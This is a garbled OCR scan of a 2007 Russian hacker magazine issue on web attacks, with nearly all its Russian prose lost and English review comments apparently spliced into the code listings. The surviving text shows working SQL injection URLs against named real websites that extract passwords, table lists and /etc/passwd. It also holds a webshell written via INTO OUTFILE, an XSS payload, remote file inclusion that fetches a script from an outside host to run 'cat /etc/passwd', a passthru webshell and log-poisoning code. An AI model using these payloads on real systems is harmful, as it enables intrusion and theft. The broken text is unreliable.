
02(75) 2007


cripting,
S

ss-Site ion
Cro L Inject
SQ

SQL Injection

16


PHP-

34

50
XSS

46

s\`j^
kljnd^
s\`j^\
y

intro
,
. ,
. ,
, ,
,
. .
,
, ,
: ,
. ,

,
IT
.

-, ,

.

: .
, ,
-,
.
, SQL- (SQL Injections)
HTML/JavaScript- (Cross-Site Scripting, XSS)
.
P.S.
e-. ,
, , .
AvaLANche

0 2 |75 | 2 0 0 7
WWW.XAKEP.RU

.
.
,
, .
.


AvaLANche (avalanche@real.xakep.ru)

(nikitin@real.xakep.ru)

Dr.Klouniz (alexander@real.xakep.ru)
(andrusha@real.xakep.ru)


-
(vasin@real.xakep.ru)

(zhukova@real.xakep.ru)

(karamnoff@real.xakep.ru)

(kiselev@real.xakep.ru)

O

(igor@gameland.ru)

(olga@gameland.ru)

E (olgaeml@gameland.ru)
(goryacheva@gameland.ru)
(alekhina@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24


(vladimir@gameland.ru)

(andrey@gameland.ru)

(popov@gameland.ru)

(kosheleva@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24



(nahalova@gameland.ru)
.: (495) 935.70.34 (. 454)



(dmitri@gameland.ru)

(shostak@gameland.ru)

(romanovski@gameland.ru)

(stepanovm@gameland.ru)

(dianova@gameland.ru)

(boris@gameland.ru)

(sidorovsky@gameland.ru)

.: 8 (800) 200-3-999

101000, , , / 652,
spec@real.xakep.ru
ScanWeb,

,

77-12014 4 2002 .
42 000 .
.

Spider_NET
c. 70

vr-online.ru,
mashp (mashp.h10.ru). .
4 ,
Delphi PHP.


c. 72

nezumi. , -8
, .
, W2K, FreeBSD 4.5.
, .


c. 54

MustLive. - 13 , ,
2.
.
. - http://websecurity.com.ua.


c. 72

Horrific. www.vr-online.ru, 11
4 . (
), .

SQL INJECTION

SPECIAL DELIVERY

68

10

70

FAQ

16

RFI-

72

06

SQL Injection

SQL Injection

PHP-

SPEC TOPIC

26

30

34

security-

50
54

78

-
:

web-

84

web-

88


web-

offtopic

XSS

46

22

38

SOFT


web-?

96

ADMINING

98


XSS

HARD

100

58

62

104

66

PERL

112

STORY

Perl

cd:

IV

Brutus AET2

SQL Injection Tools

mod_security

Audacity

SPIKE Proxy

N-Stalker Web

MySQL 5.0.27

Opera 9.10 Final

Wikto 1.63

Application Security

lighttpd 1.4.13

NoClone

Scanner 2006

Enterprise Edition 4

ASP Auditor v2 BETA

Serv-U 6.3.0.1

Advanced Vista

BeEF Browser

SQLite 3.3.11

XSpider 7.5

PHP 5.2.0

Codec Package 4.2.0

Exploitation Framework

Paros Proxy 3.2.13

Shadow Security

Vista Manager 1.0.3

XSS-proxy 0.0.11

Perl 5.8.8

WebScarab

Scanner

XSS Shell

Acunetix Web

Nmap 4.11

Vulnerability Scanner

Pantera 3

CyD Net Utils

Apache 2.2.4

Console

CD-DA
Extractor 10
Portable
AnyReader 1.9.55

WINDOWS
12(73)
WEB-

timeline
2000

{}
,
MSN Korea. , ,
, , ,
Lineage. -

ross-Site Scripting , Microsoft


, . , ,

,
.

2004

Microsoft

Cross-Site Scripting

{ }
,
phpBB (
), , 2004 hpBB.


,
. ,
.
phpBB
phpBB 2.0.11,

phpBB
-,
- . ,

2005
{ }
,

Yafoo! Japan, URL Yahoo!. 20
30 . ,
,
: , ,

,
.
,
.
, ,
.

web-
?
www.securitylab.ru
2006 , 397


cms
(Drupal, XOOPS,
PHP-Nuke )

cms
()
cms
(
cms)

44,84%
18,89%
17,63%
10,08
7,81%

2006

www.securitylab.ru

Mozilla Firefox

Internet Explorer

Safari

Opera

54%
24%
15%
7%

25 Internet Explorer 2006


. Mozilla Firefox 56,
36


. Opera
7 , Safari 16 (www.securitylab.ru/analytics/273335.php).

{Top 20} SANS Institute 20


(Top 20 Security Attack Targets), (www.sans.org/top20/).
Microsoft: Internet Explorer, Office, Windows
Libraries Mac OS X Apple
Unix.
SANS, 40 -
SQL Injection 80
ross-Site Scripting .
:
1 Web-
2
3
4
5
6 DNS-
7

{43%}
-,
PHP
. , 2006
(NIST),
securityfocus.com. 6198 , 2006 , 2690 (
c 43 ) PHP. ,
2005 PHP 29% . , , .
.

06/ 37

06

22

10

26

16 RFI-

30

34

SQL Injection
SQL INJECTION BUGTRAQ. ,
,
,
spider_net (spider_net@inbox.ru)
www.vr-online.ru

SQL Injection
SQL-,
. , . web-
.
SQL Injection
web-
PHP, Perl
AS. , ,

SQL-. web-,
, .
?
, . , , Users, . ,

>

8 02-07

3 . , (=)?

. :

SELECT * FROM Users WHERE id=



1 OR UserName=A,
:
SELECT * FROM Users WHERE id = 1
OR UserName=

: id (), UserName ( ) Password (). ,


, :
SELECT *
FROM Users
WHERE id =
, id .
, , 10, . , ,
:
SELECT *
FROM Users
WHERE id = OR UserName =


id = , ,
UserName = .
.
www.site.ru/profile.php?id=10
OR UserName=
, , URL SQL- (OR UserName=), .
,
SQL Injection! , -
.
( ,
,
) id:
, 0 9.
.
SQL , -

,
.
1 .
. (UserName = '') . ,
,
. , ,
. ,
SQL-.
, . , ,
.
2 . SQL . , ,
. :
SELECT * FROM Users WHERE UserName='root'
AND Password='<password>'
, UserName root ( ,
-), Password .
, , , .
:
SELECT * FROM Users WHERE UserName='root'--' AND Password='<password>'
(in MySQL a "--" comment must be followed by a space, so the payload is "root'-- " or "root'#")
, ,
(AND Password = ), , , , , .
SQL ,
, /*. , ,
/*. . ,
, , ,
.

, id
UserName .
, , .
:
SELECT * FROM Users WHERE id = 1
OR UserName
,
, , .
4 . ; c , . -



SQL Injection

. ,

HTML, -
(, )
.

SQL INJECTION.
SQL-
,
.

, .

, ,
,
- .


.

, ,

.

, .
?
SELECT * FROM Users WHERE id =
, , , id, :

1INSERT. .
(, - , ). , , .

SELECT * FROM Users WHERE UserName='root'
and Password='123'; INSERT INTO Users
values (0, 'spider_net', 'qwerty')
(stacked statements like this only run where the client API sends several statements per call — PHP's mysql_query(), for example, refuses them, whereas MS SQL Server clients generally accept them)

1; DELETE FROM Users


:
SELECT * FROM Users WHERE id = 1;
DELETE FROM Users
Users , id . Users. , ,
,
.
5 . SQL . , ( , ),
.

UserName ,
spider_net qwerty.
2 LIKE. LIKE =,
.
, :
SELECT * FROM Users WHERE UserName LIKE
1 AND Password LIKE
2
LIKE,

%.
, , .

SELECT * FROM Users WHERE id = 1+


OR+UserName=

SELECT * FROM Users WHERE UserName LIKE


root AND Password LIKE %

.
. SQL , ,
,
.

SQL .
, . , .

3 UNION. UNION .
,
. , - (, ), ,
.
UNION.

SELECT * FROM News WHERE id=1 UNION


SELECT Id, UserName, Password FROM Users

UserName.
4 OUTFILE. , , ,
, ?
, SQL
. :
SELECT ... INTO OUTFILE 'text.txt'
(only possible when the database account holds the FILE privilege; the file is written by the mysqld process, on the database host, and must not already exist)
,
text.txt .
, ,
. , -
SELECT '<?php system($cmd) ?>'
INTO OUTFILE 'cmd.php'
PHP-, $cmd.
, index
( ).

10 02-07

SQL Injection
.
.
,
. ,
.

aka Horrific
http://www.vr-online.ru

, , , .
APA Help Center. ,
google.com ,
URL .php id.
, ,
, , , . APA Help Center (www.apahelpcenter.org). APA? ,
The American Psychological Association .

, - . , : www.apahelpcenter.org/featuredtopics/feature.php. id, .

and 1=0 .
, .
union select 'Test' , Test. - , , . Next page,

Test. . , URL, , :
http://www.apahelpcenter.org/featuredtopics/feature.php?id=38%20and%201=
0%20union%20select%20'Test'--

SQL

11

articles users. , .
? ,
id password.
:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=38%20and%201=
0%20union%20select%20password%20FROM
%20users%20limit%200,1- apanick. :). , , , -
. .
: , /admin/index.php, admin.php .
.
. USA-.
net ,
, , . , SQL Injection.
. www.newspaperads.com. , :
1
2
3

;
USA TODAY;
ASP + MS SQL SERVER.

USA Today Yesterday,


.
:
http://www.newspaperads.com/usatoday/
results.asp?subcatid=1600&interfaceid=82&parent=Categories&subcatname=
Travel+Specials

- . , .
URL 'Test' DATABASE() :
: apahelpcenter
: 4.0.20a-debug
:
prac01web@prac01.apa.org
. ? MySQL . ,

. .
, , .
, ,

. newspaperads.com. : Advertiser, Summary Date. , . ,


subcatid. , ,
. . ,
. , .
,
, SQL-,
. ,
subcatid :
1600)) and 1=0 -

1=0 , .
,
. , .
UNION SELECT NULL,
NULL. 11 .
NULL- , , .
, .
, , . ,
0 11:
1600)) and 1=0 union all select
1,2,3,4,5,6,7,8,9,10,11-, 7 Summary.
, .
,
. INFORMATION_SCHEMA.TABLES.
subcatid:
1600)) and 1=0 union all select
1,2,3,4,5,6,TABLE_NAME,8,9,0,11
from INFORMATION_SCHEMA.TABLES- . ,
20 , 1, 2, 3 , :). .
,
. .
newspaperads.com
:).

12 02-07

The error occurred while processing


an element with a general identifier
of (CFQUERY), occupying document
position (1:1) to (1:59).
, ODBC Microsoft
Access Driver. MS Access. .
,
. , Access
SELECT, FROM . . , ,
users.
URL:
http://www.compostingcouncil.org/
section.cfm?id=29%20union%20select%201%
20from%20users

cold fusion. ,
Macromedia Cold Fusion. .
, (commerce.senate.gov). , . , URL id:
commerce.senate.gov/hearings/
witnesslist.cfm?id=1705
id=1705 and 1=1, . .
, , , . , .
, senate.gov , .

. ,
:).
. www.compostingcouncil.org. - .
,
, .
. :
http://www.compostingcouncil.org/section.cfm
id. , . :
ODBC Error Code = 37000 (Syntax error
or access violation)
[Microsoft][ODBC Microsoft Access
Driver] Syntax error (missing operator)
in query expression 'id = 29'''.

! , , . .
13 . , . ,
users. ,
userid, email memberpwd.
, ,
,
users .
,
. MS Access , MSysObjects,
name . SELECT :
http://www.compostingcouncil.org/
section.cfm?id=29%20union%20select
%201,2,3,4,5,6,name,8,9,10,11,12,13
%20from%20MSysObjects
name . web- ( ).
, , (
). . .
. , www.midwife.com.
. .
, Macromedia ColdFusion .

13

- .
, , .
, MySQL plasmacms. , - CMS
Plasma,
, . , - ,
.
, - . :
SELECT
pageID,pageBody,pageTitle,pageHeader,
pageFooter,pageFolder,pageAccess,pageURL
FROM plasmaContent
WHERE pageID=75'' LIMIT 1
, . ,
plasmaContent, CMS . , ID , , URL , . , ,
. pageURL - URL
, .
, web-, . -
.
SQL- URL:
http://www.midwife.org/news.cfm?id=
75 and 1=0 union select 1,2,3,4,5,6,7,8

: http://www.midwife.org/header.cfm. ,
, .
:
<cfif isDefined("url.id")
and not isDefined("newsPage")>

http://www.midwife.org/header.cfm?id=
75&subHeader=<script>alert('')
</ script>

member, :
1

E-MAIL -

, URL id.
: http://www.midwife.org/header.cfm?id=75. ,
:
<!--- NOTE(review): #subHeader# comes straight from the URL (the article shows it
      being set via ?subHeader=...) and is output without encoding, so injected
      markup/JavaScript renders. Wrapping it in HTMLEditFormat() (or otherwise
      HTML-encoding it) would neutralise the XSS. --->
<td
class="pageHeader"><cfoutput>#subHeader#
</cfoutput></td>
,
subHeader .
URL, URL :
subHeader=
<h1>Hello%20from%20Horrific
</h1>.
. , Hello
from Horrific.
URL- subHeader.
,
HTML-, JavaScript, XSS. URL,
JavaScript :

8 - ,
URL .

. : .
, ,
. :
C:\Inetpub\wwwroot\Clients\midwife.org\
www\plasmacms\cfm\page.cfc
,
. URL , . ,
. :
C:\Inetpub\wwwroot\Clients\midwife.org\
www\header.cfm

URL,

JAVASCRIPT
COOKIE
.

, XSS.
. , web :).
Berkeley . Berkeley.
! , http://cshe.berkeley.edu/
, . -, . ?
s, url. .

. , ,
. . and
1=1? . , SQL Injection .
, . , , .
, , .
select -

14 02-07

CHAR(60,72,49,62,117,115,101,114,60,47,
72,49,62)
,
:
<h1>user</h1>

. . user ,
<h1>. ,
JavaScript-!
, .
CHAR.
,
MySQL. ?
, , LOAD_FILE,
.
/etc/passwd.
, , ,
:
LOAD_FILE(char(47,101,116,99,47,112,97,
115,115,119,100))

/etc/passwd

, . , URL :
http://cshe.berkeley.edu/publications/
publications.php?s=1%20and%201=1%20union
%20select%201,2,3,4
, ,
, . URL, , 1=1 1=0.
ID 1, ,
.
1
4. ,
, . 1
. , ,
. 2 3 , , , .
, .
URL VERSION(), USER() DATABASE(). , ! ,
,

.
. , , ,
, . MySQL,
?
,
MySQL.
MySQL.user:
http://cshe.berkeley.edu/publications/
publications.php?s=1%20and%201=0%20union
%20select%201,2,3,4%20from%20mysql.user
, ,
MySQL user. .
user
. ?! ,
, mysql.user? . : ,
, .
? ,
MySQL.
CHAR. :

/etc/passwd.
URL
( )
.
. ,
. ?!
,
...
!
. ,
, ,
- ! , ?! -,
.


!

, URL

GamePost

:
Age of Empires III The Warchiefs -
,
,

. Age of Empires III


.

Age of Empires III: The Warchiefs

1400 .

Strategy

:
Khorinis Gothic
1 Gothic 2.
.

.
,
,
.

Gothic 3 (US)

2240 .

Adventure

:
.

, , ,
,
, .
SWAT
SWAT 4.
,
.

SWAT 4

1568 .

Action

!
GamePost

! . .
: +7 (495) 780 88 25 : sales@gamepost.ru

16 02-07

RFI-

/
PHP-
,
, ,
-
WEB-, .
,

, WEB-
C
semuha@mail.ru
. , , ? .

web- , .

.

:
,
-

- .
1

- , ,
.

17

;


.
2 , .

,
;


(/ETC, /BIN, /SBIN,
/ETC/RESOLV.CONF, /ETC/SERVICES,
/ETC/PASSWD ).
3 ,
.
:

;
;
.
4 ,
.
.


WEB- PROXOMITRON ,
HTTP-
.
5

6 GOOGLE
.


, .
Google . ,
- google it!
web-.
Google
: inurl:"index.php?page=".
, , index.php?page= - url.
, , , , page.
.
.
, web- ,
, , www.google.com
page: www.site.com/index.php?page=www.google.com. , google.com, web- .

web. web-.
(Right
Click)! (View
Source) (View) (Source). ,
HTML-. web-,
PHP, Perl, ASP
, , . ,
, .
, web-. , , . , :
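<!-- Login form as served by the site. maxlength and disabled are enforced
     only by the browser; the copy an attacker hosts (shown further down)
     simply changes or drops them, so the server must re-validate both
     fields itself. The form tag was missing its closing ">" in the listing. -->
<form name="form_name"
action="/[path]/index.php" method="post">
<input type="text" value="" name="user"
maxlength="15" size="25" />
<input type="text" value="" name="pass"
size="25" disabled/>
<input type="submit" value="Login" />
</form>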
, , , disabled.
?
,
.
,
index.php . :
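<!-- Attacker-hosted copy of the login form: same field names and an
     absolute action URL, but its own maxlength and no disabled attribute.
     Whatever the server accepts from this copy is the real input contract,
     not what the original page's HTML suggests. Closing ">" restored on the
     form tag. -->
<form name="form"
action="http://site_name.com/[path]/index.php" method="post">
<input type="text" value="" name="user"
maxlength="10" size="20" />
<input type="text" value="" name="pass"
size="20" />
<input type="submit" value="Login" />
</form>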

Milw0rm.com

, ,
. web- :).

, .
c PHP. Web-
. .ASP (Active Server Pages), .PHP (PHP
Hypertext Preprocessor) .PL (Perl). PHP- .
PHP .
PHP . PHP
. PHP
.
, , PHP ,
.
RFI-
PHP : include(), include_once(), require(), require_once().
, .
include()/require(). include()



HTTP://RU.PHP.NET

18 02-07

, , , ,
, . ,
, . ,
,
, .
include_once()/require_once(). Include_once()

. include(),
, : ,
. ,
.
require_once() include_once()
include() require().
, ,
.
register_globals. , ,
: register_globals
PHP. , .
, :
sample1.php:
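<?php
// Intentionally vulnerable demo (pair of sample2.php): $var1 selects the
// file that sample2.php includes. The quote marks appear to have been lost
// in extraction; they are restored so the snippet parses.
$var1 = "sample3";
include("sample2.php");
echo "hello";
#some code ..;
?>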
sample2.php:
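<?php
// Intentionally vulnerable: when this file is requested directly with
// register_globals on, $var1 can be set from the query string
// (?var1=...), so this include() becomes a local/remote file inclusion
// sink. Quote marks restored; the original read "Include($var1..php)".
include($var1 . ".php");
#some code ..;
?>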

PHP-. include() require()


, . include() (Warning), require() (Fatal Error). ,

,
require(). include() .
include_path
, require() include() .
PATH : , Unix
Windows.

include_path , include_path . , include_path .,


/www/, include/a.php, include sample2.php,
sample2.php /www/, /www/include/.
./ ../, include_path .

sample3.php:
<?php
#some code ..;
?>
, sample1.php sample2.php,
sample2.php sample3.php.
sample1.php
$var1 sample2.php. sample2.php
,

PHP.INI,

-

19

$var1.
: , - sample2.php.
, PHP register_globals. , . $var1
sample2.php, - sample2.php ( sample1.php),
register_globals , $var1
.
, web-
www.vul_site.com/sample1.php, ,
, www.vul_site.com/sample2.php , php.ini, , , , , sample2.php $var1. register_globals ,
: www.vul_site.com/sample2.php?var1=any_file_name.
, .
magic_quotes_gpc. ,
,
, , /etc/passwd:
www.vul_site.com/sample2.php?var1=../../
../../../../../etc/passwd.
.
, sample2.php .php ../../../../../../../etc/passwd.hp, , , . ,
- PHP-, .php.
php.ini magic_quotes_gpc. Magic_quotes_gpc ,
addslashes().
, (',",\
NUL ( NULL)) (\). GPC Get, Post, Cookie. , magic_quotes_gpc addslashes() GET-,
POST-, COOKIE-.
, magic_quotes_gpc off, ,
. PHP
\n, %00.
,
/etc/passwd:
www.vul_site.com/sample2.php?var1=../../../../../../../etc/passwd%00
(the %00 is a NUL byte that truncates the path so the appended ".php" is ignored; PHP 5.3.4 and later refuse paths containing NUL in include/require and the file functions, so this trick only works on older builds)

, ../ aka dot dot slash (Directory


Traversal Specifiers)
.
, .
, evilscript.php :
<?php
passthru($_GET[cmd]);
?>
passthru() PHP . $_GET
.
, evilscript.php
:
http://localhost/index.php?page=http://
someevilhost.com/evilscript.php?
cmd=cat /etc/passwd
-
. ,
. ,
allow_url_fopen off
. , PHP-
. HTTP-GET, PHP-, .
$CODE ='<?php ob_clean();echo
START;$_GET[cmd]=striplashes($_GET[cmd]);
passthru($_GET[cmd]);echo START;die;?>';
$content.="GET /path/".$CODE."
HTTP/1.1/n";
$content.="User-Agent: ".$CODE."/n";
$content.="Host: ".$host."/n";
$content.="Connection: close/n/n";
PHP-
. . , PHP-.
. - PHP-:
, PHP .
. register_globals magic_quotes_gpc.
Horde Kronolith. iDefence
Labs web-

Horde Kronolith,
.
,
. , ,
.

'lib/FBView.php':
177 function &factory($view)
178 {
179 $driver = basename($view);
180 require_once dirname(__FILE__) .
'/FBView/' . $view . '.php';
,
Kronolith_FreeBusy_View::factory,
, 'view' HTTPGET- . 179
basename(string path [, string suffix]) .
, .
suffix, . , basename(),
, $view. -






.

WEB-, FIREFOX,

.
DOM INSPECTOR (TOOLS!WEB DEVELOPMENT!DOM INSPECTOR).
DOM, , ,
.

DOM-
.
DOM-

.
-
DOM

,

.

20 02-07

DOM

180 $driver.
- $view . (../) (%00), web-.
,
, /etc/passwd,
$view :
http://vul_site/path/lib/FBView.php?view=
../../../../../../../../../etc/passwd%00.
, .
web-
. ,
, LFI-/RFI-
.
, -

PHP- .
,
URL, .
.
: : require($page . otherpage.php);. , . , : require(otherpage.php);. ,
index.php?page=otherpage.php ,
: index.php?otherpage.php.
?
, ,
,
\n, ,
\t, \r
. chop()
( rtrim()), .
chop():
<a href=index.php?page=file1.php>Files</a>
<?php
// Intentionally vulnerable: chop() only trims trailing whitespace, so the
// value is still fully attacker-controlled when it reaches include() —
// a local/remote file inclusion. The fix is an allow-list of permitted
// page names, not trimming. ($_GET[page] without quotes also relies on
// PHP treating the bare word as a string.)
$page = chop($_GET[page]);
include($page);
?>
, . -

PHP- Horde Kronolith

html-, ,
.
JavaScript
PHP htmlspecialchars().
PHP
,
passthru(), web-.
php.ini: set register_globals = Off and allow_url_fopen = Off — and, on PHP 5.2 and later, allow_url_include = Off, the directive that actually governs include()/require() of remote URLs. magic_quotes_gpc is not a defence here (it does nothing against ../ traversal and was removed in PHP 5.4).
.
. ,
,
require(), include()
PHP-
, . ,
, , ,
XSS- JavaScript- -.
, , . include()
:
Warning: main(%parameter%): failed
to open stream: No such file or directory
in %path% on line %x%
Warning: main(): Failed opening
'%parameter%' for inclusion
(include_path='%path%') in %path%
on line %x%
:
<?php
if(!is_file("My_param"
.$_GET['filename'])){
...
}
?>
,
, :
Warning: main(): Failed opening
My_param for inclusion
(include_path=/whatever/path/
filename.php) in /whatever/path/
filename.php
on line 2
. IT-.







aa















 



8
8
0
0
e
: GTX SLI
Forc
SUS

IA Ge
V ER
D
I
GTS
NV
TSFIELD



N
KE

DVD

4,3







&2





&2




&2)&YMQTS

&228.

;JWXZX,J+TWHJ





 


.SYJQ0JSYXKNJQI
81.
<NSIT\X;NXYF


);)

22 02-07

23


, .
, .

!
aka Crazy_script
script@real.akep.ru

3/5
Void.ru
www.void.ru

4/5
INFOSAFE
www.infosafe.ru

3,5 / 5
Root-Access
www.root-access.org


, INFOSAFE
.

,

.
-

, .


:
,
- .
: , .

-.

IT-security. ,
,

,


.
,

. ,
-
, ,

.

, .
Void.ru
,
.

.

, ,
,
.
,
- :
- , , ,
-. ,
- void.ru.
!

, .

24 02-07

4/5
Viruslist
www.Viruslist.com

5/5
SecurityLab
www.securitylab.ru


, -


:


.



. viruslist.com
-

,
( 27

)
,


. Positive
Technologies ( www.ptsecurity.ru) -,

.

,


IT-security.

,



,
-

,

.
,
IT-.
, ,


. National
Vulnerability Database


20 .

(

)


Security-.
,
.
.
.

.


.


.
SecurityLab
,
. 20
.
,

-
.
:
-
-

CMS.


,

,


.
-
,
-

4,5 / 5
Zone-H
www.zone-h.ru

,


.

6 ,
.


.




-. ,




.
,
. .

:
IT-security
. Zone-H ,

.

25

5/5
BugTraq.Ru
www.bugtraq.ru



.
, (


,
),


. ,
IT.

:

IT, ,

.
BugTraq.ru

( 83 ),

.
1997

-,
, ,
IT-security.
,
,
IT-,


Russian Security
Newsline, HackZone.Ru,
ezhe.ru. ,
BugTraq.ru must visit!

4/5
uinC
www.uinc.ru

4/5

3,5 / 5
Anti-Malware
www.anti-malware.ru

- ,
malware-.

,
ITsecurity. , ,
.


-

,
. : . Anti-Malware
Dr.Web, , ,
Panda Sofware.

www.bezpeka.com


( 2001),
uinC (Underground InformatioN
Center).
,
,
(

).
Network & security
news !

-


.

610


.
uinc.ru
,
,
.

FAQ
IT. (
).

.

RegScan,
UINC Keylogger, PE
Optimizer . , :).

,
, .

, -

.



.
34

, , .
,

,
.

26 02-07

PHP
.
,
, - .
,
.

borisvolfson@gmail.com, http://splendot.com
,
( )
. , , ,

, .
. ? ? , ,

, .
,
.
.
POST
GET. POST,
GET. , , -

.
, :

<a href="show.php?filename=
article1.html"> 1</a>
<a href="show.php?filename=
article2.html"> 2</a>
<a href="show.php?filename=
article3.html"> 3</a>
show.php, ( ).
show.php :

//

// Intentionally vulnerable: $filename arrives unchecked (from the URL via
// register_globals, per the links above) and is handed straight to
// file_get_contents(), so ../ traversal reads arbitrary local files and,
// with allow_url_fopen on, remote URLs.
echo file_get_contents($filename);
...
//
, :
.
-, (
) $filename. $_REQUEST, $_POST, $_GET
. PHP
,
. -, $filename . ,
index.php

27

PHP5

.

PHP. () PHP

(- ). ,

, , . , , , , . , .
. .
, .
( ).
,
: , , .
.
.
( 1).
.
.
HTML- html.php:

index.php
bio.php

links.php
html.php


HTML
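<?php
/**
 * Skeleton page: Write() emits <html>/<head>/<title>, a logo, the menu,
 * the subclass-supplied MainText(), the menu again and the closing tags.
 * Concrete pages only implement MainText().
 *
 * Changes from the original listing: the title is HTML-escaped before it
 * is written (the original interpolated it raw, so a title built from
 * request data could inject markup), Logo() now closes the <h1> it opens
 * (the original closed it with </h2>), and the mangled "{$this"Title}"
 * interpolation is repaired.
 */
abstract class HTMLPage
{
    /** Page title as shown in <title>; a fixed site prefix is prepended. */
    protected $Title = "";

    /**
     * @param string $Title the page-specific part of the title
     */
    function __construct($Title)
    {
        $this->Title = "[
] " . $Title;
    }

    /** Open the document and write the escaped title. */
    function BeginHTML()
    {
        // ENT_QUOTES also covers a single quote, in case the title is ever
        // reused inside a single-quoted attribute.
        // NOTE(review): pass the page's charset as the third argument if it
        // is not UTF-8 — on PHP >= 5.4 invalid UTF-8 makes this return "".
        $safeTitle = htmlspecialchars($this->Title, ENT_QUOTES);
        echo <<<HTML
<html>
<head>
<title>{$safeTitle}</title>
</head>
<body>
HTML;
    }

    /** Close the document. */
    function EndHTML()
    {
        echo <<<HTML
</body>
</html>
HTML;
    }

    /** Site logo: a fixed heading. */
    function Logo()
    {
        echo "<h1>
</h1>";
    }

    /** Static navigation table linking the three pages of the site. */
    function Menu()
    {
        echo <<<HTML
<table>
<tr>
<td><a href='index.php'>
</a></td>
<td><a href='bio.php'>
</a></td>
<td><a href='links.php'>
</a></td>
</tr>
</table>
HTML;
    }

    /** Page-specific body; every concrete page must provide it. */
    abstract function MainText();

    /** Render the whole page in the fixed order. */
    function Write()
    {
        $this->BeginHTML();
        $this->Logo();
        $this->Menu();
        $this->MainText();
        $this->Menu();
        $this->EndHTML();
    }
}
?>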
,
, .
Write
, -

.
MainText. , ,
. .

,
. , , , .

$Title protected,

, .

. , index.php:

<?php
include_once("html.php");

/**
 * Front page. All layout comes from HTMLPage; this class contributes only
 * the body paragraph through MainText().
 */
class IndexPage extends HTMLPage
{
    /** Body of the front page: a single paragraph. */
    function MainText()
    {
        print "<p>
";
    }
}

// Build the page with its title and render everything in one call.
$Page = new IndexPage("
");
$Page->Write();
?>
IndexPage,
HTMLPage
MainText
.
( 2).
. ,
. , .

.
,
HTMLPage, MainText
. .
HTMLPage,
.
.

28 02-07

Component
+Operation()
Component!Operation()

ConcreteComponent
+Operation()

Decorator
+Operations()

ConcreteDecoratorA
-AddedState
+Operation()

Decorator::Operation();
AddedBehavior();

ConcreteDecoratorB
+Operation()
+AddedBehavior()

1.

,
.

- .
: , ,
, .
if (
) .
system(). : system(), . . system
!
, :
*nix- 0, , .
. PHP MySQL ( PostgreSQL).
SQL. , , , , .
SQL ,
.
, , . :
HTML,
< >. ,
. .

. , PHP5
.
,
,
.
, ,
.
. , . , . ? .

, .
, , -

. , , , :
. ,
.
(Gang of Four, GoF)
Decorator. Decorator ,
. , ( 1).
Component (Checker)
, ConcreteComponent (StringChecker)
, . Decorator (Decorator) ,
. ConcreteDecorator (SlashChecker, BackSlashChecker)
( ). (. 1)
:

: ' // '
:

:

:

: '1365m434\'
,
:


(1)
<?php
abstract class Checker // base of the decorator chain
{
    /** Implemented by every concrete checker; prints its verdict for $StringToCheck. */
    abstract public function Check($StringToCheck);

    /**
     * Render a verdict as an HTML fragment.
     *
     * @param bool $IsOK true = check passed (green), false = failed (red)
     * @return string
     */
    function Result($IsOK)
    {
        $colour = $IsOK ? 'green' : 'red';
        return "<font color='" . $colour . "'> </font><br>";
    }
}
class StringChecker extends Checker
// Concrete component: the innermost check, length at most 100 bytes.
{
    /** Print the length verdict for $StringToCheck (strlen() counts bytes). */
    function Check($StringToCheck)
    {
        $withinLimit = strlen($StringToCheck) <= 100;
        print " : ";
        print $this->Result($withinLimit);
    }
}

29

abstract class Decorator extends Checker
// Wraps another Checker and forwards to it after its own check has run.
{
    private $MyChecker = null;

    /** @param Checker $MyChecker the checker this decorator wraps */
    function __construct(Checker $MyChecker)
    {
        $this->MyChecker = $MyChecker;
    }

    /** Delegate to the wrapped checker (no-op when none is set). */
    public function Check($StringToCheck)
    {
        $inner = $this->MyChecker;
        if (isset($inner)) {
            $inner->Check($StringToCheck);
        }
    }
}
class SlashChecker extends Decorator
// Decorator: passes only strings that contain no forward slash.
{
    /** Print the slash verdict, then hand the string to the wrapped checker. */
    public function Check($StringToCheck)
    {
        print " : ";
        $noSlash = strpos($StringToCheck, '/') === false;
        print $this->Result($noSlash);
        parent::Check($StringToCheck);
    }
}
class BackSlashChecker extends Decorator // passes only strings without a backslash
{
    /** Print the backslash verdict, then hand the string to the wrapped checker. */
    public function Check($StringToCheck)
    {
        print " : ";
        $noBackslash = strpos($StringToCheck, '\\') === false;
        print $this->Result($noBackslash);
        parent::Check($StringToCheck);
    }
}
// , , ..
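class DigitsChecker extends Decorator
{
    /**
     * Report whether $StringToCheck consists solely of ASCII digits, then
     * hand the string on to the wrapped checker.
     *
     * Differences from the original: the curly-brace string offset syntax
     * ($s{$i}, removed in PHP 8) is gone, and an empty string no longer
     * passes — the old loop ran zero times and reported success for "".
     */
    public function Check($StringToCheck)
    {
        echo " , : ";
        // \A..\z rather than ^..$ so a trailing newline cannot slip past.
        $IsOK = preg_match('/\A[0-9]+\z/', (string)$StringToCheck) === 1;
        echo $this->Result($IsOK);
        parent::Check($StringToCheck);
    }
}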
// Demo 1: outermost decorator runs first, so the order is
// backslash -> slash -> length, on a string holding two slashes.
$S1 = " // ";
print "<b> : '" . $S1 . "'</b><br>";
$Checker1 = new BackSlashChecker(new SlashChecker(new StringChecker()));
$Checker1->Check($S1);
print "<br>";
// Demo 2: digits -> backslash -> length, on a string that ends in a
// backslash (the doubled backslash is PHP escaping for a single "\").
$S2 = "1365m434\\";
print "<b> : '" . $S2 . "'</b><br>";
$Checker2 = new DigitsChecker(new BackSlashChecker(new StringChecker()));
$Checker2->Check($S2);
?>

:

:

Checker
, , , . , Check . StringChecker Check
, Decorator MyChecker
.
__construct(Checker $MyChecker)
, .
Checker, Check. Check Decorator $MyChecker!Check($StringToCheck). Check
parent::Check($StringToCheck) (Check
Decorator). , . ,
(, , , ):
$Checker = new DigitsChecker(new
BackSlashChecker(new StringChecker()));
Check:
$Checker->Check($S); // $S

. $Checker DigitsChecker,

, . , Check. Check Decorator
BackSlashChecker::Check, ,
, StringChecker::Check,
.
. ,

, . , .
Decorator
.

Decorator
Check. , , StringChecker::Check, Decorator::Check($StringToCheck) .

30 02-07


-
.
: , SQL
. ,
,


borisvolfson@gmail.com, http://splendot.com

code injection. ,
, ,
.
-, , . -,
, ,
, -

. , Google
. ,
code injection .
: ,
,
.
,
. -, -
include
, -, , . -


:
HTML + PHP
<!- -->
<?php
include ($page);
?>
<!- -->
,
http://tralivali/index.php?page=about.php. , PHP ( ):

31

PHP
<?php
phpinfo();
?>
, about.php
. , .
, PHP
, .
, .
, 3 .
;).
SQL Injection.
SQL. -,
, - . , , -
.

SQL-

JavaScript


SQL-


JavaScript

SQL-

c ,
.
,
SQL-. ,
' OR
'1'='1, . , . ;).
